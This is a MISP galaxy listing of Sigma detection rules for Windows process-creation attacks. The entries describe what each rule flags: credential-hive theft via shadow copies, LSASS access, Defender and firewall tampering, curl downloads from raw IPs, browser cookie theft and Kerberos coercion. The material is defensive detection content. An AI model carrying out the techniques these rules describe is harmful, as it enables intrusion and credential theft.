Enumerate All Information With Whoami.EXE
Detects the execution of "whoami.exe" with the "/all" flag
Internal MISP references
UUID c248c896-e412-4279-8c15-1c558067b6fa which can be used as unique global reference for Enumerate All Information With Whoami.EXE in MISP communities and other software using the MISP galaxy
External references
- https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s - webarchive
- https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ - webarchive
- https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_all_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-12-04 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_whoami_all_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1033', 'car.2016-03-001'] |
Potential Arbitrary Command Execution Via FTP.EXE
Detects execution of "ftp.exe" with the "-s" or "/s" script flag and any child processes run by "ftp.exe".
Internal MISP references
UUID 06b401f4-107c-4ff9-947f-9ec1e7649f1e which can be used as unique global reference for Potential Arbitrary Command Execution Via FTP.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, oscd.community |
| creation_date | 2020-10-09 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_ftp_arbitrary_command_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059', 'attack.defense-evasion', 'attack.t1202'] |
Sensitive File Access Via Volume Shadow Copy Backup
Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
Internal MISP references
UUID f57f8d16-1f39-4dcb-a604-6c73d9b54b3d which can be used as unique global reference for Sensitive File Access Via Volume Shadow Copy Backup in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/vxunderground/status/1423336151860002816?s=20 - webarchive
- https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection - webarchive
- https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sensitive_file_access_shadowcopy.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) |
| creation_date | 2021-08-09 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_susp_sensitive_file_access_shadowcopy.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1490'] |
Potential LethalHTA Technique Execution
Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
Internal MISP references
UUID ed5d72a6-f8f4-479d-ba79-02f6a80d7471 which can be used as unique global reference for Potential LethalHTA Technique Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Markus Neis |
| creation_date | 2018-06-07 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_mshta_lethalhta_technique.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.005'] |
Potentially Suspicious Office Document Executed From Trusted Location
Detects the execution of an Office application that points to a document located in a trusted location. Attackers often use this to avoid macro security and execute their malicious code.
Internal MISP references
UUID f99abdf0-6283-4e71-bd2b-b5c048a94743 which can be used as unique global reference for Potentially Suspicious Office Document Executed From Trusted Location in MISP communities and other software using the MISP galaxy
External references
- Internal Research
- https://twitter.com/Max_Mal_/status/1633863678909874176 - webarchive
- https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465 - webarchive
- https://twitter.com/_JohnHammond/status/1588155401752788994 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-06-21 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_office_exec_from_trusted_locations.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1202'] |
Remote Access Tool - AnyDesk Execution
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Internal MISP references
UUID b52e84a3-029e-4529-b09b-71d19dd27e94 which can be used as unique global reference for Remote Access Tool - AnyDesk Execution in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-11 |
| falsepositive | ['Legitimate use'] |
| filename | proc_creation_win_remote_access_tools_anydesk.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Potentially Suspicious Windows App Activity
Detects potentially suspicious child processes of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation or execution.
Internal MISP references
UUID f91ed517-a6ba-471d-9910-b3b4a398c0f3 which can be used as unique global reference for Potentially Suspicious Windows App Activity in MISP communities and other software using the MISP galaxy
External references
- https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ - webarchive
- https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-12 |
| falsepositive | ['Legitimate packages that make use of external binaries such as Windows Terminal'] |
| filename | proc_creation_win_susp_appx_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
REGISTER_APP.VBS Proxy Execution
Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
Internal MISP references
UUID 1c8774a0-44d4-4db0-91f8-e792359c70bd which can be used as unique global reference for REGISTER_APP.VBS Proxy Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-19 |
| falsepositive | ["Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign"] |
| filename | proc_creation_win_lolbin_register_app.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Suspicious Where Execution
Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Internal MISP references
UUID 725a9768-0f5e-4cb3-aec2-bc5719c6831a which can be used as unique global reference for Suspicious Where Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2021-12-13 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_where_browser_data_recon.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1217'] |
Potential Windows Defender Tampering Via Wmic.EXE
Detects potential tampering with Windows Defender settings, such as adding an exclusion, using wmic.
Internal MISP references
UUID 51cbac1e-eee3-4a90-b1b7-358efb81fa0a which can be used as unique global reference for Potential Windows Defender Tampering Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/ - webarchive
- https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-12-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_namespace_defender.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1047', 'attack.t1562'] |
Firewall Disabled via Netsh.EXE
Detects netsh commands that turn off the Windows firewall.
Internal MISP references
UUID 57c4bf16-227f-4394-8ec7-1b745ee061c3 which can be used as unique global reference for Firewall Disabled via Netsh.EXE in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall - webarchive
- https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/ - webarchive
- https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Fatih Sirin |
| creation_date | 2019-11-01 |
| falsepositive | ['Legitimate administration activity'] |
| filename | proc_creation_win_netsh_fw_disable.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.004', 'attack.s0108'] |
PUA - Crassus Execution
Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
Internal MISP references
UUID 2c32b543-1058-4808-91c6-5b31b8bed6c5 which can be used as unique global reference for PUA - Crassus Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | pH-T (Nextron Systems) |
| creation_date | 2023-04-17 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_pua_crassus.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.reconnaissance', 'attack.t1590.001'] |
Potential Data Stealing Via Chromium Headless Debugging
Detects Chromium-based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control.
Internal MISP references
UUID 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 which can be used as unique global reference for Potential Data Stealing Via Chromium Headless Debugging in MISP communities and other software using the MISP galaxy
External references
- https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/ - webarchive
- https://mango.pdf.zone/stealing-chrome-cookies-without-a-password - webarchive
- https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/ - webarchive
- https://github.com/defaultnamehere/cookie_crimes/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-12-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_browsers_chromium_headless_debugging.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.credential-access', 'attack.collection', 'attack.t1185', 'attack.t1564.003'] |
Remote Access Tool - ScreenConnect Installation Execution
Detects ScreenConnect program starts that establish a remote access to a system.
Internal MISP references
UUID 75bfe6e6-cd8e-429e-91d3-03921e1d7962 which can be used as unique global reference for Remote Access Tool - ScreenConnect Installation Execution in MISP communities and other software using the MISP galaxy
External references
- https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-02-11 |
| falsepositive | ['Legitimate use by administrative staff'] |
| filename | proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.initial-access', 'attack.t1133'] |
PowerShell Get-Process LSASS
Detects a "Get-Process" cmdlet (or one of its aliases) run against the lsass process, which is in almost all cases a sign of malicious activity.
Internal MISP references
UUID b2815d0d-7481-4bf0-9b6c-a4c48a94b349 which can be used as unique global reference for PowerShell Get-Process LSASS in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-04-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_getprocess_lsass.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1552.004'] |
Registry Modification Via Regini.EXE
Detects the execution of regini.exe, which can be used to modify registry keys; the changes are imported from one or more text files.
Internal MISP references
UUID 5f60740a-f57b-4e76-82a1-15b6ff2cb134 which can be used as unique global reference for Registry Modification Via Regini.EXE in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Regini/ - webarchive
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Eli Salem, Sander Wiebing, oscd.community |
| creation_date | 2020-10-08 |
| falsepositive | ['Legitimate modification of keys'] |
| filename | proc_creation_win_regini_execution.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1112', 'attack.defense-evasion'] |
Suspicious Provlaunch.EXE Child Process
Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
Internal MISP references
UUID f9999590-1f94-4a34-a91e-951e47bedefd which can be used as unique global reference for Suspicious Provlaunch.EXE Child Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-08 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_provlaunch_susp_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Attempts of Kerberos Coercion Via DNS SPN Spoofing
Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
or a check for the presence of such records through the nslookup command.
Internal MISP references
UUID 0ed99dda-6a35-11ef-8c99-0242ac120002 which can be used as unique global reference for Attempts of Kerberos Coercion Via DNS SPN Spoofing in MISP communities and other software using the MISP galaxy
External references
- https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html - webarchive
- https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_kerberos_coercion_via_dns_spn_spoofing.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-06-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_kerberos_coercion_via_dns_spn_spoofing.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.credential-access', 'attack.persistence', 'attack.privilege-escalation', 'attack.t1557.001', 'attack.t1187'] |
Suspicious PowerShell Invocation From Script Engines
Detects suspicious PowerShell invocations from script interpreters or unusual parent programs.
Internal MISP references
UUID 95eadcb2-92e4-4ed1-9031-92547773a6db which can be used as unique global reference for Suspicious PowerShell Invocation From Script Engines in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-01-16 |
| falsepositive | ['Microsoft Operations Manager (MOM)', 'Other scripts'] |
| filename | proc_creation_win_powershell_script_engine_parent.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
File Download From IP URL Via Curl.EXE
Detects file downloads directly from an IP address URL using curl.exe.
Internal MISP references
UUID 9cc85849-3b02-4cb5-b371-3a1ff54f2218 which can be used as unique global reference for File Download From IP URL Via Curl.EXE in MISP communities and other software using the MISP galaxy
External references
- https://labs.withsecure.com/publications/fin7-target-veeam-servers - webarchive
- https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv - webarchive
- https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-10-18 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_curl_download_direct_ip_exec.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
OneNote.EXE Execution of Malicious Embedded Scripts
Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
Internal MISP references
UUID 84b1706c-932a-44c4-ae28-892b28a25b94 which can be used as unique global reference for OneNote.EXE Execution of Malicious Embedded Scripts in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | @kostastsale |
| creation_date | 2023-02-02 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_office_onenote_embedded_script_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.001'] |
MpiExec Lolbin
Detects a certain command line flag combination used by the mpiexec.exe LOLBIN from HPC Pack that can be used to execute any other binary.
Internal MISP references
UUID 729ce0ea-5d8f-4769-9762-e35de441586d which can be used as unique global reference for MpiExec Lolbin in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lolbin_mpiexec.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.t1218'] |
Install New Package Via Winget Local Manifest
Detects usage of winget to install applications via a manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option allows an application to be installed by passing a YAML file directly to the client. Winget can then be used to download and install exe, msi or msix files.
Internal MISP references
UUID 313d6012-51a0-4d93-8dfc-de8553239e25 which can be used as unique global reference for Install New Package Via Winget Local Manifest in MISP communities and other software using the MISP galaxy
External references
- https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Winget/ - webarchive
- https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Sreeman, Florian Roth (Nextron Systems), frack113 |
| creation_date | 2020-04-21 |
| falsepositive | ['Some false positives are expected in some environment that may use this functionality to install and test their custom applications'] |
| filename | proc_creation_win_winget_local_install_via_manifest.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1059'] |
Suspicious Shells Spawn by Java Utility Keytool
Detects suspicious shells spawned from the Java utility keytool process (e.g. ADSelfService Plus exploitation).
Internal MISP references
UUID 90fb5e62-ca1f-4e22-b42e-cc521874c938 which can be used as unique global reference for Suspicious Shells Spawn by Java Utility Keytool in MISP communities and other software using the MISP galaxy
External references
- https://redcanary.com/blog/intelligence-insights-december-2021 - webarchive
- https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_keytool_susp_child_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Andreas Hunkeler (@Karneades) |
| creation_date | 2021-12-22 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_java_keytool_susp_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.persistence', 'attack.privilege-escalation'] |
Suspicious IIS URL GlobalRules Rewrite Via AppCmd
Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can reach their webshells.
Internal MISP references
UUID 7c8af9b2-dcae-41a2-a9db-b28c288b5f08 which can be used as unique global reference for Suspicious IIS URL GlobalRules Rewrite Via AppCmd in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r - webarchive
- https://twitter.com/malmoeb/status/1616702107242971144 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-22 |
| falsepositive | ['Legitimate usage of appcmd to add new URL rewrite rules'] |
| filename | proc_creation_win_iis_appcmd_susp_rewrite_rule.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
PowerShell Base64 Encoded Reflective Assembly Load
Detects base64-encoded .NET reflective loading of an Assembly.
Internal MISP references
UUID 62b7ccc9-23b4-471e-aa15-6da3663c4d59 which can be used as unique global reference for PowerShell Base64 Encoded Reflective Assembly Load in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ - webarchive
- https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems), pH-T (Nextron Systems) |
| creation_date | 2022-03-01 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_powershell_base64_reflection_assembly_load.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001', 'attack.defense-evasion', 'attack.t1027', 'attack.t1620'] |
HackTool - Certify Execution
Detects Certify, a tool for Active Directory certificate abuse, based on PE metadata characteristics and common command line arguments.
Internal MISP references
UUID 762f2482-ff21-4970-8939-0aa317a886bb which can be used as unique global reference for HackTool - Certify Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | pH-T (Nextron Systems) |
| creation_date | 2023-04-17 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_certify.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.credential-access', 'attack.t1649'] |
Suspicious Child Process Of BgInfo.EXE
Detects suspicious child processes of "BgInfo.exe", which could be a sign of abuse of the binary to proxy execution via an external VBScript.
Internal MISP references
UUID 811f459f-9231-45d4-959a-0266c6311987 which can be used as unique global reference for Suspicious Child Process Of BgInfo.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/ - webarchive
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-16 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_bginfo_suspicious_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.005', 'attack.defense-evasion', 'attack.t1218', 'attack.t1202'] |
Wlrmdr.EXE Uncommon Argument Or Child Process
Detects the execution of "Wlrmdr.exe" with the "-u" command line flag, which allows anything passed to it to be an argument of the ShellExecute API and would therefore allow an attacker to execute arbitrary binaries. This detection also covers any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that possess "ParentImage" telemetry.
Internal MISP references
UUID 9cfc00b6-bfb7-49ce-9781-ef78503154bb which can be used as unique global reference for Wlrmdr.EXE Uncommon Argument Or Child Process in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wlrmdr_uncommon_child_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, manasmbellani |
| creation_date | 2022-02-16 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wlrmdr_uncommon_child_process.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Suspicious File Execution From Internet Hosted WebDav Share
Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content from it, as seen used in malicious LNK files.
Internal MISP references
UUID f0507c0f-a3a2-40f5-acc6-7f543c334993 which can be used as unique global reference for Suspicious File Execution From Internet Hosted WebDav Share in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/ShadowChasing1/status/1552595370961944576 - webarchive
- https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | pH-T (Nextron Systems) |
| creation_date | 2022-09-01 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_cmd_net_use_and_exec_combo.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Tor Client/Browser Execution
Detects the use of Tor or Tor-Browser to connect to onion routing networks
Internal MISP references
UUID 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c which can be used as unique global reference for Tor Client/Browser Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_browsers_tor_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1090.003'] |
Audit Policy Tampering Via Auditpol
Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
Internal MISP references
UUID 0a13e132-651d-11eb-ae93-0242ac130002 which can be used as unique global reference for Audit Policy Tampering Via Auditpol in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Janantha Marasinghe (https://github.com/blueteam0ps) |
| creation_date | 2021-02-02 |
| falsepositive | ['Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored'] |
| filename | proc_creation_win_auditpol_susp_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.002'] |
Potential Provlaunch.EXE Binary Proxy Execution Abuse
Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
Internal MISP references
UUID 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c which can be used as unique global reference for Potential Provlaunch.EXE Binary Proxy Execution Abuse in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
